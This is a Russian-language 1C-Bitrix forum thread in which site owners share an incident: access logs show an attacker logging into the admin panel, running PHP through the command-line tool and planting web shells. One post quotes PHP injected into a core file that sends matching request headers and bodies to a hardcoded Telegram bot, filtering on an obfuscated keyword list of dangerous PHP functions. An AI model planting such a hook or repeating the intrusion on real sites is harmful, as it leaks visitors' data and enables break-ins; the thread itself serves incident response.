1С-Битрикс Разработчикам - Заражение сайтов

Посетитель

Сообщений: 40 Баллов: 6 Регистрация: 11.03.2021

#326

07.06.2025 01:45:03

Интерсный запрос вчера в логе словил
138.124.31.112 - - [06/Jun/2025:08:33:32 +0300] "GET /bitrix/tools/composite_data.php HTTP/1.1"

А немногим позже обращение к трояну
138.124.31.112 - - [06/Jun/2025:11:42:02 +0300] "GET /6940ecae5880.php HTTP/1.1"

Интерсно то что через /bitrix/tools/composite_data.php уже ломились, года три этак назад, тогда выкатили обновление и лазейку прикрыли, а сейчас хакеры видать что то поменяли и снова ломятся в ту же дверь...

Пользователь 40932

Заглянувший

Сообщений: 2 Регистрация: 10.09.2015

#327

10.06.2025 17:03:38

всем привет, вести с полей:

по всей видимости брутят пароль или просто подбирают по словарям либо же по открытым источникам.

в автоматическом режиме авторизовываются в адмике, переходят в исполнение php кода, ну а дальше уже раскидывают файлики accesson.php, wp-cron.php, wp-blog-header.php, папки wp/

Код

$ cat domain.tld-access.log | grep 138.124.31.112
138.124.31.112 - - [10/Jun/2025:16:41:43 +0300] domain.tld "GET /bitrix/admin/index.php?login=yes HTTP/1.0" 301 162 0.000 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "-"
138.124.31.112 - - [10/Jun/2025:16:41:43 +0300] domain.tld "GET /bitrix/admin/index.php?login=yes HTTP/1.0" 200 22561 0.029 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "-"
138.124.31.112 - - [10/Jun/2025:16:41:44 +0300] domain.tld "POST /bitrix/admin/index.php?login=yes HTTP/1.0" 200 130 0.079 "https://domain.tld/bitrix/admin/index.php?login=yes" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"
138.124.31.112 - - [10/Jun/2025:16:41:45 +0300] domain.tld "GET /bitrix/admin/php_command_line.php?lang=ru HTTP/1.0" 200 516420 0.236 "https://domain.tld/bitrix/admin/index.php?login=yes" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"
138.124.31.112 - - [10/Jun/2025:16:41:47 +0300] domain.tld "POST /bitrix/admin/php_command_line.php?lang=ru&sessid=988ba2358ed8b995e528d42a436d6699 HTTP/1.0" 200 119 0.110 "https://domain.tld/bitrix/admin/php_command_line.php?lang=ru" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"
138.124.31.112 - - [10/Jun/2025:16:41:48 +0300] domain.tld "POST /bitrix/admin/php_command_line.php?lang=ru&sessid=988ba2358ed8b995e528d42a436d6699 HTTP/1.0" 200 119 0.078 "https://domain.tld/bitrix/admin/php_command_line.php?lang=ru&sessid=988ba2358ed8b995e528d42a...; "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"
138.124.31.112 - - [10/Jun/2025:16:41:52 +0300] domain.tld "POST /bitrix/admin/accesson.php HTTP/1.0" 200 9 0.056 "https://domain.tld/bitrix/admin/php_command_line.php?lang=ru&sessid=988ba2358ed8b995e528d42a...; "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"
138.124.31.112 - - [10/Jun/2025:16:42:02 +0300] domain.tld "GET /bitrix/admin/570762b20afa.php HTTP/1.0" 200 9 0.001 "https://domain.tld/bitrix/admin/accesson.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2923.31 Safari/537.36" "138.124.31.112" "-" "DsM2TSOen18rh45NwqBLjKSmt8VA19H4"

несколько раз всё вычищал, пока не понял что в админку входят.

вывод: после того, как почистили не забудьте поменять пароли.

Пользователь 126180 Заглянувший Сообщений: 2 Регистрация: 25.10.2012	#328 10.06.2025 20:22:06 Кто хочет закрыть сайт по странам на основе IP - это легко сделать, если у вас ISP панель на хостинге. И действует вариант с актуальными базами.

Пользователь 4265440

Посетитель

Сообщений: 40 Баллов: 6 Регистрация: 11.03.2021

#329

11.06.2025 23:03:05

Цитата
написал: по всей видимости брутят пароль или просто подбирают по словарям либо же по открытым источникам

Подскажите, а штатный механизм защиты административного раздела /bitrix/admin/security_iprule_admin.php был задействован?

Пользователь 407969

Посетитель

Сообщений: 33 Баллов: 6 Регистрация: 12.01.2017

#330

26.06.2025 18:17:31

Сегодня перестала работать авторизация. Ругалось на bitrix/modules/main/include/prolog_before.php

Вот содержимое:

Код

$suspicious = [
'ev' . 'a' . 'l','sy' . 'st' . 'em','pas' . 'sth' . 'ru','ex' . 'ec','she' . 'll_' . 'exec',
    'bas' . 'e64_' . 'decode','she' . 'll','pop' . 'en','pro' . 'c_o' . 'pen','cur' . 'l_e' . 'xec',
    'fop' . 'en','fil' . 'e_ge' . 't_co' . 'nte' . 'nts','ass' . 'ert','pre' . 'g_re' . 'plac' . 'e',
    'php' . 'inf' . 'o','mk' . 'dir','un' . 'link','ch' . 'mod','inc' . 'lud' . 'e',
    'req' . 'uir' . 'e','mov' . 'e_up' . 'load' . 'ed_f' . 'ile','fil' . 'e_pu' . 't_co' . 'nte' . 'nts','rea' . 'dfi' . 'le',
    'soc' . 'ket_' . 'cre' . 'ate','str' . 'eam' . '_soc' . 'ket_cl' . 'ient','cre' . 'ate_' . 'fun' . 'ctio' . 'n',
    'dl(','par' . 'se_' . 'str','ini' . '_se' . 't','err' . 'or_' . 'rep' . 'ort' . 'ing','set' . '_tim' . 'e_li' . 'mit',
    'pro' . 'c_cl' . 'ose','pcl' . 'ose','pcn' . 'tl_' . 'ex' . 'ec','sy' . 'ml' . 'ink','re' . 'nam' . 'e','ch' . 'own', '/etc' . '/pass' . 'wd'
];

function containsSuspiciousRecursive($array, $suspicious) {
    foreach ($array as $k => $v) {
        foreach ($suspicious as $word) {
            if (stripos($k, $word) !== false) return true;
            if (is_string($v) && stripos($v, $word) !== false) return true;
         if (is_array($v) && containsSuspiciousRecursive($v, $suspicious)) return true;
        }
    }
    return false;
}

$headers = getallheaders();

if (containsSuspiciousRecursive($_REQUEST, $suspicious) || containsSuspiciousRecursive($headers, $suspicious)) {
   $data = "METHOD: {$_SERVER['REQUEST_METHOD']}" . PHP_EOL;
   $data .= "TARGET: {$_SERVER['REQUEST_URI']}" . PHP_EOL;
   $data .= "IP: {$_SERVER['REMOTE_ADDR']}" . PHP_EOL;
   $data .= "UA: {$_SERVER['HTTP_USER_AGENT']}" . PHP_EOL . PHP_EOL;
   $data .= "HEADERS:" . PHP_EOL;
   foreach ($headers as $name => $value) {
      $data .= "$name: $value" . PHP_EOL;
   }
   $data .= PHP_EOL . "BODY:" . PHP_EOL . print_r($_REQUEST, true);

    file_get_contents(
        "https://api.telegram.org/bot7783741198:AAG6KTeA-X19Xw4x16sQOm6ZwFUpHQAVd90/sendMessage?" .
        "chat_id=-1002753657432&text=" . urlencode($data)
    );
}

define("START_EXEC_PROLOG_BEFORE_1", microtime(true));
$GLOBALS["BX_STATE"] = "PB";
if(isset($_REQUEST["BX_STATE"])) unset($_REQUEST["BX_STATE"]);
if(isset($_GET["BX_STATE"])) unset($_GET["BX_STATE"]);
if(isset($_POST["BX_STATE"])) unset($_POST["BX_STATE"]);
if(isset($_COOKIE["BX_STATE"])) unset($_COOKIE["BX_STATE"]);
if(isset($_FILES["BX_STATE"])) unset($_FILES["BX_STATE"]);

if(!isset($USER)) {global $USER;}
if(!isset($APPLICATION)) {global $APPLICATION;}
if(!isset($DB)) {global $DB;}

require_once(__DIR__."/. ./include.php");

CMain::PrologActions();

Другой информации пока нет.
Я правильно понимаю, что какие-то данные сливались злоумышленникам в телегу?

Пользователь 670305 Постоянный посетитель Сообщений: 152 Баллов: 31 Регистрация: 12.08.2016	#331 27.06.2025 15:43:01 Нет, здесь, похоже, предполагалось в телегу пересылать подозрительные запросы к сайту.

Заражение сайтов

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером